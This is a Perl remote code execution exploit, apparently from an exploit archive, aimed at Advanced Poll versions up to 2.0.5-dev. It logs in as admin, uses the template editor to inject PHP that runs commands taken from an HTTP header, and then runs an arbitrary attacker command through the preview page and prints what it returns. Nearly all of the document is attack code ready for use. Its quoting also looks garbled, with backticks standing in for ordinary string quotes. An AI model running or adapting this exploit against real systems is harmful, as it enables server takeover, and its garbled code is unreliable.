Advanced Poll <= 2.0.5-dev Remote Code Execution Exploit#!/usr/bin/perl -w
# Advanced Poll 2.0.0 >= 2.0.5-dev textfile RCE.
#
# date: 30/07/06
# 
# diwou <diwou@phucksys.org>
#
# PHCKSEC (c) 2001-2006.
#
# Hey, what a mad world!
#

use strict;
use warnings;
use LWP::UserAgent;
use MD5;

#
# args: http://url/apoll_path cmd
#
# proxy: export PROXY='http|https://www.my.big.and.famous.proxy:8080/'
# url: http|https://tatget:(port)/phppoll/
#

die(`RTFC! ;)`) unless(@ARGV>1);

my ($lwp,$agent,$out,$res,$url,$cmd)=(undef,undef,undef,undef,$ARGV[0],$ARGV[1]);

my %ipost=
(
	poll_tplset => 'default',
	'tpl[display_head.html]' =>
<<HEAD
\\`.system(getenv(HTTP_PHP)).exit().\\`
<table width=`\$pollvars[table_width]` border=`0` cellspacing=`0` cellpadding=`1` bgcolor=`\$pollvars[bgcolor_fr]`>
  <tr align=`center`>
    <td><style type=`text/css`>
       <!--
        .input { font-family: \$pollvars[font_face]; font-size: 8pt}
        .links { font-family: \$pollvars[font_face]; font-size: 7.5pt; color: \$pollvars[font_color]}
       -->
      </style><font face=`\$pollvars[font_face]` size=`-1` color=`#FFFFFF`><b>\$pollvars[title]</b></font></td>
  </tr>
  <tr align=`center`>
    <td>
      <table width=`100%` border=`0` cellspacing=`0` cellpadding=`2` align=`center` bgcolor=`\$pollvars[bgcolor_tab]`>
        <tr>
          <td height=`40` valign=`middle`><font face=`\$pollvars[font_face]` color=`\$pollvars[font_color]` size=`1`><b>\$question</b></font></td>
        </tr>
        <tr align=`right` valign=`top`>
          <td>
            <form method=`post` action=`\$this->form_forward`>
            <table width=`100%` border=`0` cellspacing=`0` cellpadding=`0` align=`center`>
              <tr valign=`top` align=`center`>
                <td>
                  <table width=`100%` border=`0` cellspacing=`0` cellpadding=`1` align=`center`>
HEAD
,
	action   =>  '',
	tplset   =>  'default',
	tpl_type =>  'display',
	session  =>  '',
	uid      =>  1
);

my %epost=
(
	session    => '',
	uid        => 1,
	poll_tplst => 'default',
	tpl_type   => 'display',
);

my %zday=
(
	username => 'jakahw4nk4h',
	'pollvars[poll_username]' => 'jakahw4nk4h',
	password => 'fuckoff',
	'pollvars[poll_password]' => ''
);

$zday{'pollvars[poll_password]'}=&amp;md5($zday{password});
$agent=`Hey IDS! i'm gonna fuck your advanced poll right? B===D`; # post method doesnt log it, so doesnt matter.
#$agent=`Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1`;

$lwp=new LWP::UserAgent();
$lwp->agent($agent);
$lwp->timeout(10);
$lwp->protocols_allowed(['http','https']);

if($ENV{PROXY})
{
	$lwp->proxy(['http','https'],$ENV{PROXY});
	print `Using proxy `.$ENV{PROXY}.`\n`;
}

$url.=`/` if($url!~/\/$/);
$url.=`admin/index.php`;
print `Doing some pretty with `.$url.`...\n\n`;

print `+ generating session...\n`;
$out=$lwp->post($url,\%zday)->content();
if($out=~ /index\.php\?session=((.){32})/)
{
	$ipost{'session'}=$epost{'session'}=$1;
	print `  session: `.$ipost{'session'}.`\n`;
	
	$url=~s/index\.php/admin_templates\.php/g;
	print `+ injecting diplay_head.html template...\n`;
	$out=$lwp->post($url,\%ipost)->content();
	$epost{'action'}=$1 if($out=~ /<input type=`submit` name=`action` value=`(.*)` class=`button`>/);
	print `  button: `.$epost{'action'}.`\n`;

	$url=~s/admin_templates\.php/admin_preview\.php/g;
	print `+ executing...\n`;
	$out=$lwp->post($url,\%epost,PHP => `echo BOCE;`.$cmd.`;echo EOCE`)->content();

	print `-- BOCE --\n`;
	foreach $out (split(/\n/,$out))
	{
		$res=1,next if($out=~/BOCE/);
		$res=0,next if($out=~/EOCE/);
		print $out.`\n` if($res);
	}
	print `-- EOCE --\n`;
}
else
{
	print `don't worry, u can improve me! eh eh eh :D?\n`;
}

sub md5
{
	$_=new MD5;
	$_->add(@_);
	return unpack(`H*`,$_->digest());
}

# milw0rm.com [2007-02-13]